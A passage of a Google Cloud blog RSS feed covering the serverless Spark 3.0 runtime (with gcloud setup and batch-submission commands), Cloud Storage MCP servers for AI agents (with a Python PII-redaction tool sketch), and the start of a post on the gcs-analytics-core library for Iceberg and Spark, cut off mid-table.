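&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;From the command line, the two steps above followed by a first batch submission might look like the sketch below. It rests on some assumptions: the service name &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;dataproc.googleapis.com&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; is inferred from the API link in step 1, the SparkPi example and its jar path follow the batch quickstart and may differ in your environment, and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;PROJECT_ID&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;USER_EMAIL&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;REGION&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; are placeholders.&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;# Step 1: enable the API (service name inferred from the console link above)
gcloud services enable dataproc.googleapis.com

# Step 2 (run by a project admin): grant the Editor role to a user
# PROJECT_ID and USER_EMAIL are placeholders
gcloud projects add-iam-policy-binding PROJECT_ID \
  --member="user:USER_EMAIL" \
  --role="roles/dataproc.serverlessEditor"

# Submit a sample Spark batch pinned to the 3.0 runtime version
# REGION is a placeholder; the jar path follows the quickstart example
gcloud dataproc batches submit spark \
  --region=REGION \
  --version=3.0 \
  --jars=file:///usr/lib/spark/examples/jars/spark-examples.jar \
  --class=org.apache.spark.examples.SparkPi \
  -- 1000&lt;/code&gt;&lt;/pre&gt;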
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now you’re ready to &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc-serverless/docs/quickstarts/spark-batch#submit_a_spark_batch_workload"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;start running your workloads&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on the Serverless 3.0 runtime version.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; For more details, visit our updated &lt;/span&gt;&lt;a href="https://cloud.google.com/dataproc-serverless/docs/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and access serverless Managed Service for Apache Spark in the &lt;/span&gt;&lt;a href="https://console.cloud.google.com/dataproc"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud console&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Wed, 03 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/data-analytics/serverless-managed-service-for-apache-spark-runtime-3-0-features/</guid><category>Streaming</category><category>Data Analytics</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>What’s new in serverless Managed Service for Apache Spark</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/products/data-analytics/serverless-managed-service-for-apache-spark-runtime-3-0-features/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Vinay Londhe</name><title>Software Engineering Manager</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Bhooshan Mogal</name><title>Senior Product 
Manager</title><department></department><company></company></author></item><item><title>Connecting AI agents with unstructured data using Google Cloud Storage MCP Servers</title><link>https://cloud.google.com/blog/topics/developers-practitioners/build-ai-agents-faster-with-gcs-google-cloud-storage-mcp-server/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud Storage (GCS) is a foundational component of the modern agentic tech stack and the preferred home for unstructured data at scale. As enterprises deploy agents in production, the critical focus has shifted to turning data into context and building secure, standardized integrations to access context. This is the core of smart storage: making unstructured data inherently agent-ready by turning passive objects into rich context for reasoning. Whether it’s automating complex financial workflows or diagnosing system failures in seconds, AI success now depends on how seamlessly agents can leverage this intelligence to make smart, high-stakes decisions.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, we will share &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;three&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; examples of agents built by customers using GCS, and then show how you can securely and reliably connect your agents to GCS using &lt;/span&gt;&lt;a href="https://modelcontextprotocol.io/docs/getting-started/intro" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Model Context Protocol&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (MCP). Combined with smart storage features like auto annotations and object contexts, the GCS MCP server simplifies the whole agent deployment process.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Real-world agent success on Google Cloud Storage&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are seeing incredible innovation from customers leveraging MCP and Google’s agentic tech stack to solve complex business problems:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Palo Alto Networks&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; built the Strata Co-Pilot agent, a screen-aware AI assistant that guides network security administrators through complex configuration flows—either by highlighting steps or executing them directly. The agent is powered by the Gemini Live API, with GCS serving as its “historical memory” connected via the GCS MCP server.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Airwallex &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;developed an AI Assistant that understands user context, answers questions, and executes workflows on the user's behalf. For example, it can analyze expense policy documents and generate detailed approval workflows, a task that would normally take hours to do manually. The agent uses GCS to store documents and GCS metadata to store the extracted information.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee"
      href="https://youtube.com/watch?v=F0Kw_eD5Y04"
      data-glue-modal-trigger="uni-modal-F0Kw_eD5Y04-"
      data-glue-modal-disabled-on-mobile="true"&gt;

      
        

        &lt;div class="article-video__aspect-image"
          style="background-image: url(https://storage.googleapis.com/gweb-cloudblog-publish/images/maxresdefault_zruL8XX.max-1000x1000.jpg);"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Introducing Airwallex AI Assistant: Your concierge for effortless global finance&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg role="img" class="h-c-video__play h-c-icon h-c-icon--color-white"&gt;
        &lt;use xlink:href="#mi-youtube-icon"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"
     data-glue-modal="uni-modal-F0Kw_eD5Y04-"
     data-glue-modal-close-label="Close Dialog"&gt;
   &lt;a class="glue-yt-video"
      data-glue-yt-video-autoplay="true"
      data-glue-yt-video-height="99%"
      data-glue-yt-video-vid="F0Kw_eD5Y04"
      data-glue-yt-video-width="100%"
      href="https://youtube.com/watch?v=F0Kw_eD5Y04"
      ng-cloak&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Snap's &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Job Optimization Agent analyzes Flink and Spark job specs, metadata, and historical metrics stored on GCS across thousands of jobs to find optimization opportunities, generate cost estimates, and tune configurations. Using this agent, Snap is already seeing investigation time reduced from 30 minutes to 30 seconds!&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In all three agents, the GCS MCP server handles data operations and enforces standard RBAC and access policies.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Connecting agents to GCS using MCP &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;MCP has rapidly emerged as the &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;universal &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;standard for connecting agents to data sources, but building custom servers from scratch is often a slow, distracting process that diverts focus from innovation. This path introduces significant development overhead and risk, as it forces you to manage everything from authentication and error handling to keeping pace with GCS’s evolving capabilities. To solve this, GCS offers two powerful MCP server options — Remote and Local — allowing you to offload the foundational plumbing and focus on creating value.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Remote MCP server: Fully-managed &lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Connecting your agents to the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/use-cloud-storage-mcp"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Storage MCP server&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; requires zero infrastructure deployment. By simply pointing your agent configuration to the managed endpoint, you gain immediate access to your unstructured data on GCS, allowing you to scale your agentic workloads effortlessly without the burden of operational overhead. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Because the Cloud Storage MCP server follows the open MCP standard, it works seamlessly with major agentic frameworks like ADK and is compatible with MCP clients. You can easily connect clients like Google Antigravity and Anthropic’s Claude by adding a Custom Connector in the settings. Simply point it to your Cloud Storage MCP endpoint, and you are ready to start building — no complex configuration files required.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/image1_9FCB2cO.gif"
        
          alt="image1"&gt;
        
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Connecting an agent to storage requires robust security and governance. GCS MCP server is built on Google Cloud's standard identity, observability, and security frameworks:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Identity-first security&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Authentication is handled entirely through Identity and Access Management (IAM) rather than shared keys. This ensures agents can only access data (buckets and objects) explicitly authorized by the user.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Full observability&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: To track agent activity, every request and action taken via these MCP servers is logged in Cloud Audit Logs. This provides security teams with a record of every interaction, maintaining visibility alongside ease of access.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;MCP security - content scanning&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: You can optionally configure the MCP endpoint with Google’s content security service, Google Cloud Model Armor. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;This allows you to implement security controls against common MCP attack vectors—such as direct and indirect prompt injection attacks, MCP Tool poisoning attacks, and malicious URL/SQL injections—as well as prevent the leakage of sensitive data.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Storage MCP servers are perfect for most production use cases; however, as with all remote servers, you lose the capability to fully customize your MCP tools.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Local MCP Server: Self-managed for controlled customization&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;While the Remote server handles standard data access, Local MCP is the right choice when you need to build &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;custom tools&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; specific to your business logic. For example, if your agent needs to perform specialized data transformations—such as redacting PII or adding context from another internal system—whenever it reads a file from GCS, a Local MCP server allows you to define those unique capabilities.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The GCS Local MCP server is an open-source &lt;/span&gt;&lt;a href="https://github.com/googleapis/gcloud-mcp/tree/main/packages/storage-mcp" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GitHub repository&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; of Google-maintained tools that provides you with a reliable bridge to your data. Here are a few tips to keep in mind while designing custom tools:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Provide precise, clear descriptions to minimize incorrect invocations by the models&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Implement model-friendly error handling for models to understand their mistakes and self-correct&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
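&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As a rough illustration of both tips, here is a minimal Python sketch of a custom tool that redacts PII on read. It is not taken from the GCS Local MCP repository and does not use any MCP SDK: the function names, the regular expressions, and the in-memory dictionary that stands in for a bucket are all hypothetical. The docstring plays the role of the tool description, and the error path returns a structured message a model could act on.&lt;/span&gt;&lt;/p&gt;

```python
import re

# Hypothetical patterns for illustration only; production PII detection
# should rely on a vetted inspection service rather than two regexes.
EMAIL_PATTERN = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
SSN_PATTERN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")


def redact_pii(text: str) -> str:
    """Replace email addresses and US SSN-shaped numbers with placeholders."""
    text = EMAIL_PATTERN.sub("[REDACTED_EMAIL]", text)
    return SSN_PATTERN.sub("[REDACTED_SSN]", text)


def read_object_redacted(objects: dict, object_name: str) -> dict:
    """Read one text object and return its contents with PII redacted.

    Use this tool when the caller needs the text of a single object and must
    not see email addresses or SSNs. `object_name` is the full object path,
    for example "policies/expenses.txt". `objects` is an assumed in-memory
    stand-in for a bucket, mapping object names to text.
    """
    if object_name not in objects:
        # Model-friendly error: state what failed and how to recover.
        return {
            "ok": False,
            "error": f"Object '{object_name}' was not found.",
            "hint": "Call again with one of the names in 'available_objects'.",
            "available_objects": sorted(objects),
        }
    return {"ok": True, "content": redact_pii(objects[object_name])}
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Returning the list of valid object names alongside the error gives the model enough context to retry with a correct argument instead of repeating the same call.&lt;/span&gt;&lt;/p&gt;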
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The GCS Local MCP is now also a part of the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/pre-built-tools-with-mcp-toolbox"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;MCP Toolbox for Databases&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a single open-source repository containing connectors for major data services such as GCS, BigQuery, AlloyDB, Spanner, and Cloud SQL, making it easier to monitor and manage your data ecosystem. The Toolbox offers simplified development with reduced boilerplate code, enhanced security through OAuth2 and OIDC, and end-to-end observability with OpenTelemetry integration.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Get started&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Whether you are optimizing an existing process like Snap or automating workflow creation like Airwallex, your unstructured data is one of your agent's greatest assets.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Explore the generally available &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/use-cloud-storage-mcp"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;GCS Remote MCP Server&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Check out our GCS Local MCP&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;a href="https://github.com/googleapis/gcloud-mcp/tree/main/packages/storage-mcp" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;GitHub repository&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to start building custom tools today, or use it as part of &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/pre-built-tools-with-mcp-toolbox"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;MCP Toolbox for Databases&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="mailto:storage-ai@google.com"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Reach out&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to us to discuss your Agent use case with GCS data.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description><pubDate>Tue, 02 Jun 2026 17:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/developers-practitioners/build-ai-agents-faster-with-gcs-google-cloud-storage-mcp-server/</guid><category>Developers &amp; Practitioners</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/Hero-image.max-600x600.png" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Connecting AI agents with unstructured data using Google Cloud Storage MCP Servers</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/Hero-image.max-600x600.png</image><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/developers-practitioners/build-ai-agents-faster-with-gcs-google-cloud-storage-mcp-server/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Himanshu Kohli</name><title>Product Manager, Google Cloud</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Manjul Sahay</name><title>Product Manager, Google Cloud</title><department></department><company></company></author></item><item><title>Accelerating data lakes: Optimizing Apache Iceberg and Spark with gcs-analytics-core</title><link>https://cloud.google.com/blog/products/data-analytics/optimize-iceberg-and-spark-workloads-with-gcs-analytics-core/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Many data engineers spend significant time managing compatibility and getting best performance across multiple analytics engines. 
To help solve this pain point, we are excited to announce &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/gcs-analytics-core" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;gcs-analytics-core&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a new open-source Java library designed to centralize and accelerate analytics optimizations for &lt;/span&gt;&lt;a href="https://cloud.google.com/storage"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Storage (GCS)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With this library, you can choose your preferred analytics engine and still get high performance on GCS. The gcs-analytics-core library provides optimizations for analytics engines that you use on GCS today, like the Iceberg Spark engine, and we plan to expand to other analytics engines by the end of this year.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Built to be shared across major data processing frameworks like Apache Spark, this library consolidates and improves performance for analytics workloads on GCS. Available natively in the Apache Iceberg Java runtime starting from version &lt;/span&gt;&lt;a href="https://iceberg.apache.org/releases/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;1.11.0&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, this library improves read operations for columnar formats like Parquet.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;What is the gcs-analytics-core library?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The gcs-analytics-core library is a centralized optimization layer that sits between your analytics engines — such as Apache Spark, Trino, and Apache Hive — and the underlying GCS Java SDK. It intercepts read calls and injects performance enhancements, providing a consistent experience without requiring framework-specific tuning.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For Apache Iceberg users, it integrates into the GCSFileIO implementation, replacing traditional sequential reads with parallelized strategies to minimize latency and maximize throughput.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Key technical optimizations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The library introduces specific optimizations designed to reduce time spent on I/O and end-to-end execution time:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Vectored I/O (threaded):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; This feature improves read performance by fetching multiple data ranges in parallel within a single operation, reducing the overhead of GCS calls. Without this feature, the system needs to issue a separate call for each data range, increasing both the number of operations and open file latency for each request.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Smart Parquet prefetching:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; When reading Parquet data, analytics engines typically perform an initial read of the file’s footer, which contains the data structure and information about where specific data ranges are located. The library automatically prefetches this footer data in a single chunk (typically 50KB–100KB), avoiding the multiple network calls that often occur when engines repeatedly seek backward to fetch metadata.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
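&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To make the two ideas concrete, here is a small Python sketch. It is not the library's implementation (gcs-analytics-core is a Java library), and every name in it is hypothetical: a bytes object stands in for a GCS object, and slicing stands in for a ranged read. It only illustrates the shape of the techniques: several ranges requested concurrently, and the tail of the file fetched in one request.&lt;/span&gt;&lt;/p&gt;

```python
from concurrent.futures import ThreadPoolExecutor


def read_range(blob: bytes, start: int, length: int) -> bytes:
    """Stand-in for one ranged read against an object; here it slices bytes."""
    return blob[start:start + length]


def vectored_read(blob: bytes, ranges: list, max_workers: int = 4) -> list:
    """Fetch several (start, length) ranges concurrently, preserving order."""
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        futures = [pool.submit(read_range, blob, s, n) for s, n in ranges]
        # Collect results in submission order, not completion order.
        return [f.result() for f in futures]


def prefetch_footer(blob: bytes, footer_size: int) -> bytes:
    """Read the tail of the object in a single request so that later footer
    and metadata lookups can be served from memory."""
    start = max(0, len(blob) - footer_size)
    return read_range(blob, start, len(blob) - start)
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this sketch, a caller would first call prefetch_footer to learn where the column chunks live, then pass those offsets to vectored_read in one batch rather than issuing one read per range.&lt;/span&gt;&lt;/p&gt;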
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Spotlight: Apache Iceberg integration&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We delivered the first major integration of this library into &lt;/span&gt;&lt;a href="https://iceberg.apache.org/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Apache Iceberg&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;With Iceberg 1.11.0 or later, analytics engines utilizing Iceberg’s GCSFileIO can leverage these performance enhancements. To adopt the library in your environment, verify your Iceberg catalog is configured to use the native GCS FileIO:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;# Spark configuration example
spark.sql.catalog.my_catalog.io-impl=org.apache.iceberg.gcp.gcs.GCSFileIO&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Because the core optimizations are embedded within the updated Iceberg runtime and the GCS connector architecture, you automatically benefit from Parquet footer prefetching and multi-threaded vectored reads — with no complex custom tuning required.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can follow the specific integration details in Apache Iceberg &lt;/span&gt;&lt;a href="https://github.com/apache/iceberg/issues/14326" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Issue #14326&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Catalog compatibility&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The gcs-analytics-core library is compatible with all Iceberg catalogs, including the REST catalog, Hive, and other metadata management systems. Because the performance optimizations are decoupled from the catalog management layer, the library provides consistent read improvements without requiring changes to your existing infrastructure setup, so you can scale across diverse data lake architectures.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;TPC-DS Performance Benchmarks using Spark&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To validate these improvements, end-to-end benchmarking was performed using an open source Apache Spark cluster with an Iceberg catalog configured to use GCSFileIO along with the gcs-analytics-core library.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The benchmark leveraged the industry-standard &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;TPC-DS&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; schema across varying dataset sizes (from 1GB up to 10TB), specifically comparing the new library's optimizations against the default GCSFileIO implementation, which uses sequential vectored reads.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By alleviating the I/O bottleneck at the storage layer, compute engines spend less time waiting for network responses (scan time) and more time processing data (execution time).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here are the end-to-end TPC-DS benchmark results showcasing the percentage improvement when enabling gcs-analytics-core:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/TPC-DS_benchmark_for_gcs-analytics-core_I7.max-1000x1000.jpg"
        
          alt="TPC-DS benchmark for gcs-analytics-core"&gt;
        
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;&lt;table style="width: 99.4778%;"&gt;&lt;colgroup&gt;&lt;col style="width: 29.2169%;"/&gt;&lt;col style="width: 32.5301%;"/&gt;&lt;col style="width: 38.253%;"/&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;TPC-DS schema size&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
